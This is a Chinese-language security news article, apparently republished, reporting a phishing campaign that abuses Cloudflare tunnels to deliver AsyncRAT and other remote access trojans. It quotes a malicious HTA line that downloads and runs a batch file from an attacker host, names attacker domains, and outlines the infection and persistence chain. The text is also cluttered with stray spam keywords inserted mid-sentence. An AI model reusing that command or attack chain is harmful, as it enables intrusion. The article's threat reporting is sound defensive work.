您现在的位置是:网络安全 >>正文
黑客滥用 Cloudflare 隧道基础设施传播多种远程访问木马
网络安全9242人已围观
简介网络安全专家发现一起复杂攻击活动,攻击者利用Cloudflare的隧道基础设施分发多种远程访问木马RAT)。该基础设施自2024年2月以来展现出极强的持久性,作为恶意文件和木马的分发平台,使攻击者能够 ...
网络安全专家发现一起复杂攻击活动 ,黑客攻击者利用Cloudflare的滥用隧道基础设施分发多种远程访问木马(RAT)。
该基础设施自2024年2月以来展现出极强的隧道设施持久性,作为恶意文件和木马的基础分发平台,使攻击者能够未经授权访问受害者系统。传播
包括Forcepoint、多种Fortinet 、远程Orange和Proofpoint在内的访问安全厂商已记录这一持续性威胁,源码下载强调其不断演变的木马特性以及对全球组织日益增长的影响。

主要感染途径始于包含恶意附件的黑客钓鱼邮件,这些附件伪装成发票或订单文件 。滥用
这类邮件通常制造虚假紧迫感,隧道设施并可能包含伪造的基础对话记录和回复以显得真实可信。
附件通常采用"application/windows-library+xml"文件格式 ,传播由于相比二进制文件看似无害 ,亿华云多种经常能绕过电子邮件安全网关 。
当用户打开文件时 ,会建立与托管在Cloudflare隧道基础设施上的远程WebDav资源的连接。
攻击基础设施分析Sekoia威胁检测与研究(TDR)团队持续监控这一攻击基础设施,内部代号为"Cloudflare隧道基础设施传播多种RAT" 。
分析显示,攻击采用复杂的多阶段感染链,运用多种混淆技术规避检测系统。高防服务器这种复杂性表明 ,即便在2025年 ,威胁行为体仍在开发创新方法来绕过现代安全控制措施。
攻击者利用带有"trycloudflare.com"后缀的域名(如"malawi-light-pill-bolt.trycloudflare.com"和"players-time-corresponding-th.trycloudflare.com"等)托管恶意内容 。该基础设施最终投放的载荷会在受感染系统上建立持久远程访问 ,可能导致数据窃取和进一步网络入侵 。
感染链技术细节感染过程始于用户与伪装成PDF文档的LNK文件交互。该快捷方式并非打开合法文档 ,云计算而是从同一远程服务器执行HTA文件。HTA内容揭示攻击进展:
复制`Set oShell = CreateObject("WScript.Shell") oShell.Run "cmd. exe /c curl -o %temp%\ben.bat https://players-time-corresponding-th.trycloudflare.com/ben.bat && %temp%\ben.bat", 0, false self. Close`1.此脚本触发BAT文件安装Python并执行混淆的Python代码 ,随后将下一阶段载荷注入"notepad.exe"进程。

注入notepad.exe进程(来源 :Sekoia)
为实现持久化,恶意软件创建启动项 ,包含两个VBS文件和另一个放置在Windows启动文件夹中的BAT文件 。
最终阶段使用PowerShell反射加载从JPEG图像下载的载荷(内含base64编码的建站模板载荷) ,通过"duckdns.org"等动态DNS服务建立与命令控制服务器的RAT连接。

感染链示意图(来源:Sekoia)
通过涉及Windows-library文件 、LNK文件、HTA执行和Python注入的复杂多阶段过程分发AsyncRAT的感染链
该攻击活动的演变表明,威胁行为体持续调整技术以绕过安全控制,凸显了采用多层检测方法和持续监控类似攻击模式的源码库重要性。
Tags:
转载:欢迎各位朋友分享到网络,但转载请说明文章出处“信息技术视野”。http://www.bziz.cn/html/16b499979.html
相关文章
苹果,微软,Google终于决定要干掉密码了!
网络安全说起密码,你会想起什么?密码太多,记不住?图省事所有网站用同一个密码,一个泄露了,手忙脚乱地去改密码?网站被脱库,数据库信息泄露,密码丢失?这一切都的根本原因就是:服务器保存了我们的密码不管是明文的还 ...
【网络安全】
阅读更多更明智的网络风险管理策略
网络安全根据普华永道最新的年度全球 CEO 调查,网络安全现在被列为全球首要任务之一,就担忧程度而言,它仅次于疫情。因此,网络安全风险管理策略不应再被视为 CTO 和 IT 总监的关注点,而每个供应链和技术总 ...
【网络安全】
阅读更多八个方法管理 GitHub 用户权限
网络安全如同世界正在经历的疫情,由于网络攻击的大幅增加,许多公司也遭受着“网络疫情”,保障代码安全迫在眉睫。阅读本文,将带您了解如何在代码发布到 GitHub 之前最大化安全权限,及查看创建计划来锁定 Gi ...
【网络安全】
阅读更多
热门文章
最新文章
友情链接
- 手机安装APP提示解析错误怎么办
- Excel表格中将竖列数据求和的方法教程
- 了解120gPro(性能出众、拍照优秀、续航强大,让你畅快体验智能科技的魅力)
- 索泰1070性能评测及用户体验(一款强劲的显卡,为你带来出色的游戏体验)
- 骁龙821刷Win10教程(轻松将骁龙821打造为一台功能强大的Windows10设备)
- Excel突出显示前10%数据的方法
- 锤子T2体验报告(锤子T2全面评测,从外观到性能全方位解析)
- 如何设置笔记本电脑启动U盘(一步步教你将U盘设置为笔记本电脑的启动选项)
- 使用ISOU盘启动盘的完整教程(简单实用的ISOU盘制作与使用方法)
- excel将图片置于文字底层的教程 网站建设云服务器b2b信息平台香港物理机企业服务器亿华云源码库